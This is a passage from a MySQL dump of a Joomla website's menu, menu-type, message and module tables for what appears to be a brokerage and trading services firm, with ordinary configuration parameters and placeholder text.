00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"1\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":0,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"0\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',141,142,0,'*',0),(681,'mainmenu','Clients','clients1','','clients1','index.php?option=com_content&view=article&id=114','component',1,1,1,22,736,'2016-04-03 09:51:04',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',139,140,0,'*',0),(682,'mainmenu','FIT Portfolio','fitproductsportfolio','','about-us/fitproductsportfolio','index.php?option=com_content&view=article&id=118','component',1,678,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',110,111,0,'*',0),(683,'mainmenu','Brokerage Manage','wasata','','services/wasata','index.php?option=com_content&view=article&id=119','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',114,115,0,'*',0),(684,'mainmenu','On-Line Trading','borsat','','services/borsat','index.php?option=com_content&view=article&id=120','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',116,117,0,'*',0),(685,'mainmenu','E-Trade','e-trade','','services/e-trade','index.php?option=com_content&view=article&id=121','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',118,119,0,'*',0),(686,'mainmenu','Mobile/Tablet Trading','mobiletablettrading','','services/mobiletablettrading','index.php?option=com_content&view=article&id=122','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',120,121,0,'*',0),(687,'mainmenu','Interfaces','interfaces','','services/interfaces','index.php?option=com_content&view=article&id=123','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',122,123,0,'*',0),(688,'mainmenu','Portfolio manage','portfoliomanagement','','services/portfoliomanagement','index.php?option=com_content&view=article&id=124','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',124,125,0,'*',0),(689,'mainmenu','FUND','fund','','services/fund','index.php?option=com_content&view=article&id=125','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',126,127,0,'*',0),(690,'mainmenu','FUND (2)','fund-2','','services/fund-2','index.php?option=com_content&view=article&id=125','component',-2,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',132,133,0,'*',0),(691,'mainmenu','IPO Manager','ipo-manager','','services/ipo-manager','index.php?option=com_content&view=article&id=126','component',1,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',128,129,0,'*',0),(692,'mainmenu','IPO Manager (2)','ipo-manager-2','','services/ipo-manager-2','index.php?option=com_content&view=article&id=126','component',-2,677,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',130,131,0,'*',0),(693,'mainmenu','Services','services2','','services2','index.php?option=com_content&view=article&id=115','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_tags\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',135,136,0,'*',0); /*!40000 ALTER TABLE `fit_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_menu_types` -- DROP TABLE IF EXISTS `fit_menu_types`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_menu_types` ( `id` int(10) unsigned NOT NULL auto_increment, `menutype` varchar(24) NOT NULL, `title` varchar(48) NOT NULL, `description` varchar(255) NOT NULL default '', PRIMARY KEY (`id`), UNIQUE KEY `idx_menutype` (`menutype`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_menu_types` -- LOCK TABLES `fit_menu_types` WRITE; /*!40000 ALTER TABLE `fit_menu_types` DISABLE KEYS */; INSERT INTO `fit_menu_types` VALUES (3,'top','Top','Links for major types of users'),(6,'mainmenu','Main Menu','Simple Home Menu'),(7,'typography','Typography',''); /*!40000 ALTER TABLE `fit_menu_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_messages` -- DROP TABLE IF EXISTS `fit_messages`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_messages` ( `message_id` int(10) unsigned NOT NULL auto_increment, `user_id_from` int(10) unsigned NOT NULL default '0', `user_id_to` int(10) unsigned NOT NULL default '0', `folder_id` tinyint(3) unsigned NOT NULL default '0', `date_time` datetime NOT NULL default '0000-00-00 00:00:00', `state` tinyint(1) NOT NULL default '0', `priority` tinyint(1) unsigned NOT NULL default '0', `subject` varchar(255) NOT NULL default '', `message` text NOT NULL, PRIMARY KEY (`message_id`), KEY `useridto_state` (`user_id_to`,`state`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_messages` -- LOCK TABLES `fit_messages` WRITE; /*!40000 ALTER TABLE `fit_messages` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_messages_cfg` -- DROP TABLE IF EXISTS `fit_messages_cfg`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_messages_cfg` ( `user_id` int(10) unsigned NOT NULL default '0', `cfg_name` varchar(100) NOT NULL default '', `cfg_value` varchar(255) NOT NULL default '', UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_messages_cfg` -- LOCK TABLES `fit_messages_cfg` WRITE; /*!40000 ALTER TABLE `fit_messages_cfg` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_messages_cfg` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_modules` -- DROP TABLE IF EXISTS `fit_modules`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_modules` ( `id` int(11) NOT NULL auto_increment, `asset_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to the #__assets table.', `title` varchar(100) NOT NULL default '', `note` varchar(255) NOT NULL default '', `content` text NOT NULL, `ordering` int(11) NOT NULL default '0', `position` varchar(50) NOT NULL default '', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `published` tinyint(1) NOT NULL default '0', `module` varchar(50) default NULL, `access` int(10) unsigned default NULL, `showtitle` tinyint(3) unsigned NOT NULL default '1', `params` text NOT NULL, `client_id` tinyint(4) NOT NULL default '0', `language` char(7) NOT NULL, PRIMARY KEY (`id`), KEY `published` (`published`,`access`), KEY `newsfeeds` (`module`,`published`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=290 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_modules` -- LOCK TABLES `fit_modules` WRITE; /*!40000 ALTER TABLE `fit_modules` DISABLE KEYS */; INSERT INTO `fit_modules` VALUES (2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(6,0,'Unread Messages','','',1,'header',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_unread',3,1,'',1,'*'),(7,0,'Online Users','','',2,'header',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_online',3,1,'',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(44,0,'Login Module','','',1,'mega3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(45,0,'Menu','','',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"nav nav-list\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"well\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(52,244,'Breadcrumbs','','',1,'breadcrumbs',736,'2015-03-12 09:35:56','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_breadcrumbs',1,0,'{\"showHere\":\"1\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showLast\":\"1\",\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(114,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(125,0,'Menu Module','','<p>This is an example of a module being displayed inside the menu dropdowns. This feature can display any module or module position, allowing for multiple modules in the same dropdown.</p>\r\n<a class=\"readon\"><span>Read More</span></a>',1,'mega1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(128,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(129,0,'Search','','',1,'roof-6',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_finder',1,0,'{\"searchfilter\":\"\",\"show_autosuggest\":\"1\",\"show_advanced\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"nopadding-bottom nopadding-top\",\"field_size\":25,\"alt_label\":\"\",\"show_label\":\"0\",\"label_pos\":\"top\",\"show_button\":\"1\",\"button_pos\":\"right\",\"opensearch\":\"1\",\"opensearch_title\":\"\"}',0,'*'),(130,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(131,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(153,0,'box1 title1','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',6,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1 title1 